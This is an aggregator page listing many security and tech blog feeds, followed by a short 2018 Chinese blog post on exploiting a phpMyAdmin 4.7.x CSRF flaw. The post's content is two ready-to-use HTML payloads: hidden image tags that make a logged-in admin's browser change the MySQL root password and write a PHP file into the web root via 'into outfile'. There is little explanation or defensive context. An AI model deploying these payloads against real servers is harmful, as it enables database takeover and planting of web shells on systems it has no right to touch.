惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Google DeepMind News
Google DeepMind News
T
The Blog of Author Tim Ferriss
MongoDB | Blog
MongoDB | Blog
B
Blog RSS Feed
N
News and Events Feed by Topic
GbyAI
GbyAI
I
InfoQ
P
Privacy & Cybersecurity Law Blog
AWS News Blog
AWS News Blog
Cisco Talos Blog
Cisco Talos Blog
C
Check Point Blog
Recent Announcements
Recent Announcements
D
Darknet – Hacking Tools, Hacker News & Cyber Security
D
Docker
P
Proofpoint News Feed
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Scott Helme
Scott Helme
C
CERT Recently Published Vulnerability Notes
Apple Machine Learning Research
Apple Machine Learning Research
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
N
News and Events Feed by Topic
C
CXSECURITY Database RSS Feed - CXSecurity.com
Microsoft Security Blog
Microsoft Security Blog
L
LangChain Blog
W
WeLiveSecurity
S
Securelist
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
www.infosecurity-magazine.com
www.infosecurity-magazine.com
K
Kaspersky official blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Schneier on Security
Schneier on Security
Stack Overflow Blog
Stack Overflow Blog
S
Security Affairs
NISL@THU
NISL@THU
O
OpenAI News
Vercel News
Vercel News
C
Cyber Attacks, Cyber Crime and Cyber Security
Y
Y Combinator Blog
T
Tor Project blog
G
GRAHAM CLULEY
T
Tailwind CSS Blog
博客园 - Franky
Webroot Blog
Webroot Blog
Simon Willison's Weblog
Simon Willison's Weblog
Martin Fowler
Martin Fowler
WordPress大学
WordPress大学
V2EX - 技术
V2EX - 技术
H
Help Net Security
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
F
Full Disclosure

Phpmyadmin on 轻风云

centos7安装phpmyadmin
phpMyAdmin 4.7.x CSRF 漏洞利用
2018-12-23 · via Phpmyadmin on 轻风云

修改root密码:
保存为:webshell.html

[HTML]

1
2
<p>Hello World</p>
    <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc
写文件
首先你要知道路径
保存为:webshell.html

[Bash shell]

1
2
<p>Hello World</p>
    <img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />